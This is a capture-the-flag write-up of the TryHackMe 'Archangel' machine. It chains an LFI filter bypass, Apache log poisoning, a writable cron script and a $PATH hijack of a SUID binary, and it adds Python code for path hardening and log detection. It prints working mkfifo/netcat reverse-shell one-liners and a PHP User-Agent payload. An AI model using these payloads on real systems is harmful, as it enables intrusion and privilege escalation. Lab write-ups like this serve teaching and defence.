[TryHackMe] Archangel (LFI + file parsing vulnerability getshell, modifying $PATH + SUID privilege escalation)


The host attacked in this article is legally authorized. The tools and methods used in this article are only for learning and communication. Do not use the tools and penetration ideas from this article for any illegal purpose. I will not be responsible for any consequences arising from that, nor for any misuse or damage caused.

Service discovery

└─# nmap -sV -Pn 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDT
Nmap scan report for
Host is up (0.32s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds 

Attacking port 80

Directory brute-forcing

└─# python3 dirsearch.py -e* -t 100 -u 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/

Error Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.log


[06:02:37] Starting: 
[06:03:59] 301 - 312B - /flags ->
[06:04:06] 301 - 313B - /images ->
[06:04:06] 200 - 0B - /images/
[06:04:08] 200 - 19KB - /index.html 
[06:04:29] 301 - 312B - /pages ->
[06:04:30] 200 - 0B - /pages/ 
[06:04:44] 403 - 277B - /server-status 

/flags redirects to a YouTube video and gives no other information, so it should be a rabbit hole; the other folders contain nothing else of interest.

Checking the page source, we find a domain name in the "Send us a mail" section; write mafialive.thm into the hosts file:

echo " mafialive.thm" >> /etc/hosts

Open mafialive.thm and find flag1

Brute-force the directories again

└─# python3 dirsearch.py -e* -t 100 -u http://mafialive.thm

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt

Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log

Target: http://mafialive.thm/

[06:52:01] Starting: 
[06:53:22] 200 - 59B - /index.html 
[06:53:50] 200 - 34B - /robots.txt
[06:54:02] 200 - 286B - /test.php 

Open test.php and click the button on the page: the URL then shows a file path. Changing the file name in that path lets us read the content of some files on the server, which indicates an LFI vulnerability.

We use the PHP pseudo-protocol php://filter to output the source code of the entire page; the payload is as follows


Print out the source code of test.php and get flag2

Review the include code

<?php
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}

if (isset($_GET["view"])) {
    if (!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
        include $_GET['view'];
    } else {
        echo 'Sorry, Thats not allowed';
    }
}

The include only runs when the view parameter does not contain the literal string ../.. and does contain /var/www/html/development_testing; both conditions are plain substring checks.

We can use // instead of / (i.e. ..//..//) so that the literal ../.. never appears and the check is bypassed, and read /etc/passwd. The payload is as follows
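To show why the substring check fails and what a check that survives the ..// trick looks like, here is an added Python re-implementation of the filter logic (not the challenge's PHP, not part of the original writeup), with a hardened version that canonicalises the path before comparing it with the allowed base directory; the file name page.php is a constructed placeholder.

```python
import posixpath

BASE = "/var/www/html/development_testing"

def contains_str(s: str, sub: str) -> bool:
    """Mirror of the page's containsStr(): a plain substring test."""
    return s.find(sub) != -1

def vulnerable_allows(view: str) -> bool:
    """Decision logic of the original test.php: block the literal '../..' and
    require the base path somewhere in the string. '..//..//' never contains
    '../..' literally, so it passes, and so does a php:// wrapper string that
    merely mentions the base path."""
    return (not contains_str(view, "../..")) and contains_str(view, BASE)

def hardened_allows(view: str) -> bool:
    """Canonicalise first, then require the result to stay under BASE.
    posixpath.normpath collapses '..//..//' to where it really points, so the
    decision is made on the resolved path, not on its spelling. Anything that
    is not an absolute filesystem path (e.g. a php:// wrapper) is rejected."""
    if not view.startswith("/") or "\0" in view:
        return False
    resolved = posixpath.normpath(view)
    return resolved == BASE or resolved.startswith(BASE + "/")

# Constructed inputs: a legitimate page (hypothetical name) and the two
# parameter values used in the writeup.
SAMPLES = {
    "legit": BASE + "/page.php",
    "bypass": BASE + "/..//..//..//..//etc/passwd",
    "wrapper": "php://filter/convert.base64-encode/resource=" + BASE + "/test.php",
}

def evaluate():
    """name -> (accepted by the original check, accepted by the hardened check)"""
    return {name: (vulnerable_allows(v), hardened_allows(v)) for name, v in SAMPLES.items()}
```

posixpath.normpath is purely lexical; on a live server resolve with realpath() as well, so a symlink inside BASE cannot point outside it either.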


After base64-decoding the output we get the user list

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

From the above we can see there is a user archangel. Brute-forcing this user's SSH password gave no result, so we have to think of other methods.

After some testing, I found the path of Apache's access.log



Apache 2.4-2.9 has a file parsing vulnerability (log poisoning). Combined with LFI, we can write the payload into the log and then include the log file through the web page, which triggers the reverse shell.

First, let's look at what a normal log record looks like:

 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 

As the log above shows, Apache records the requested URL path and the User-Agent header.

So we can put PHP code into the User-Agent. Taking the record above as an example, the effect we expect is this:

 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "<?php phpinfo(); ?>" 

Then access this log in the browser

If the php version information can be displayed on the web page at this time, it means that our php code can be executed normally
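From the defender's side, both halves of this technique leave traces in exactly the log that gets abused. The following added Python detector (not part of the original writeup) parses Apache combined-format lines and flags requests whose include parameter points at php:// wrappers, traversal sequences or /var/log/, or whose User-Agent carries a PHP open tag; the three sample lines are constructed and 10.0.0.5 is a placeholder client address.

```python
import re
from urllib.parse import unquote

# Apache combined log format, the layout seen in the writeup's access.log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers for the two halves of the technique: PHP code planted in a header that
# Apache writes to the log, and an include parameter aimed at that log, at a
# traversal, or at a php:// stream wrapper.
UA_MARKERS = ("<?php", "<?=")
TARGET_MARKERS = ("php://", "/var/log/", "../")

def analyse_line(line: str):
    """Return the reasons a log line looks like LFI / log poisoning ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    target = unquote(m.group("target"))  # decode %2e%2e style encodings first
    for marker in TARGET_MARKERS:
        if marker in target:
            reasons.append(f"request target contains {marker!r}")
    for marker in UA_MARKERS:
        if marker in m.group("ua"):
            reasons.append(f"user-agent contains {marker!r}")
    return reasons

def scan(lines):
    """Index of each suspicious line -> reasons; clean lines are left out."""
    return {i: r for i, line in enumerate(lines) if (r := analyse_line(line))}

# Constructed sample log: a normal include, the passwd read through php://filter,
# and the poisoned include of the log file itself.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Nov/2021:14:10:02 +0530] "GET /test.php?view=/var/www/html/development_testing/page.php HTTP/1.1" 200 286 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Nov/2021:14:20:11 +0530] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 9041 "-" "<?php phpinfo(); ?>"',
]
```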


Open burpsuite, we write the payload to User-Agent:

GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1
Host: mafialive.thm
User-Agent: "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f') ?>"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1 

Start the listener

nc -lnvp 4444



Reverse shell received

└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 54296
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
$ ls
$ cd /home
$ ls
$ cd archangel
$ ls

user.txt is in the home folder. The secret folder cannot be read, and the myfiles folder holds a password file whose content is just the YouTube video Don't Give Up (AKA: Tease You).

Privilege escalation to archangel

Through linpeas we found a scheduled task (cron job) belonging to archangel, and the script it runs is world-writable

www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh
cat /opt/helloworld.sh
echo "hello world" >> /opt/backupfiles/helloworld.txt
www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh
ls -alh /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 20  2020 /opt/helloworld.sh 

Write the reverse shell into the cron script

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f" >> /opt/helloworld.sh 

Reverse shell received

└─# nc -lnvp 4242 
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 37592
/bin/sh: 0: can't access tty; job control turned off
$ whoami
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)

Get the second user.txt in /home/archangel/secret

Privilege escalation to root

In the same folder there is a backup file with the SUID bit set. After downloading it to the attack machine and analyzing it with the strings command, we find a shell fragment:

└─# strings backup
cp /home/user/archangel/myfiles/* /opt/backupfiles 


We observe the above line of shell code

cp /home/user/archangel/myfiles/* /opt/backupfiles 

This line copies the contents of /home/user/archangel/myfiles/* to /opt/backupfiles with the cp command.

A SUID file runs with the privileges of its owner, here root, even when an ordinary user executes it. So although cp is invoked on behalf of the ordinary user, it runs as root. That means that if we can hijack this command and replace its content, we can use it to escalate privileges.

In Linux, the directories searched for commands are listed in the user's $PATH environment variable. When a command is typed in the terminal, the shell searches the directories in $PATH one by one; if a binary with that name exists it is executed, otherwise "command not found" is reported. Because backup calls cp by name rather than by absolute path, the lookup follows the $PATH of whoever runs it.

Start the escalation

View the current user's environment variable $PATH

echo $PATH

Add the home directory /home/archangel to the environment variable $PATH

archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
echo $PATH

Create a cp file under the newly added $PATH path and give it execution permission

archangel@ubuntu:~$ touch cp
touch cp
archangel@ubuntu:~$ chmod +x cp
chmod +x cp 

Add the following code to the newly created cp file

bash -p 

View the cp file

archangel@ubuntu:~$ cat cp
cat cp
bash -p 

Everything is ready: execute the SUID file backup and escalate to root

archangel@ubuntu:~/secret$ ./backup
root@ubuntu:~/secret# id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
root@ubuntu:~/secret# cat /root/root.txt
cat /root/root.txt 
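To make the lookup order and the exposure concrete, here is an added Python audit (not part of the original writeup) that resolves a command the way the shell does and lists the $PATH directories the current user could write to ahead of the real binary; the trusted directory, the writable home directory and the stub cp files are all constructed in a temporary folder.

```python
import os
import tempfile

def shell_lookup(cmd: str, path: str):
    """Resolve cmd like a shell: the first executable file found in PATH order."""
    for d in path.split(os.pathsep):
        candidate = os.path.join(d, cmd)
        if d and os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def hijackable_entries(cmd: str, path: str):
    """PATH directories the current user can write to that are searched before
    (or at) the directory holding the real cmd. A file named cmd dropped there
    shadows the real one; a SUID binary that calls a bare 'cp' inherits this
    exposure from the caller's environment."""
    exposed = []
    for d in path.split(os.pathsep):
        if d and os.path.isdir(d) and os.access(d, os.W_OK):
            exposed.append(d)
        if d and os.path.isfile(os.path.join(d, cmd)):
            break  # real command found; later entries are never consulted
    return exposed

def write_stub(path: str):
    with open(path, "w") as f:
        f.write("#!/bin/sh\n")  # placeholder executable, does nothing
    os.chmod(path, 0o755)

def demo():
    """Constructed scenario mirroring the writeup: trusted dir with the real cp,
    then a user-writable home dir prepended to PATH and a fake cp planted there."""
    with tempfile.TemporaryDirectory() as root:
        trusted = os.path.join(root, "bin")
        home = os.path.join(root, "home")
        os.mkdir(trusted)
        os.mkdir(home)
        real_cp = os.path.join(trusted, "cp")
        write_stub(real_cp)
        os.chmod(trusted, 0o555)  # not writable by an ordinary user
        hijacked_path = home + os.pathsep + trusted
        result = {
            "real_resolved": shell_lookup("cp", trusted) == real_cp,
            "exposed_first": hijackable_entries("cp", hijacked_path)[:1] == [home],
        }
        fake_cp = os.path.join(home, "cp")
        write_stub(fake_cp)
        result["shadowed"] = shell_lookup("cp", hijacked_path) == fake_cp
        os.chmod(trusted, 0o755)  # restore so the temp dir can be removed
        return result
```

The same hijackable_entries check against a real $PATH is what tools like linpeas report as writable PATH folders; the fix on the binary side is to call /bin/cp by absolute path and not inherit the caller's environment.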


A wonderful target machine; I learned a lot. There are generally two ways to get a shell through LFI:

1. LFI + file upload getshell
2. LFI + file parsing vulnerability getshell

This article uses the second method. I have a record of the first method in another target-machine writeup.

For privilege escalation, the method of modifying the $PATH environment variable was used. This method needs to be combined with a SUID binary. This article hijacks the cp command, but other commands can be hijacked in the same way, such as mv, tar, etc., depending on the specific situation of the target machine.

Tags: Cyber Security

Posted by kaedus on Fri, 06 Jan 2023 02:58:45 +0530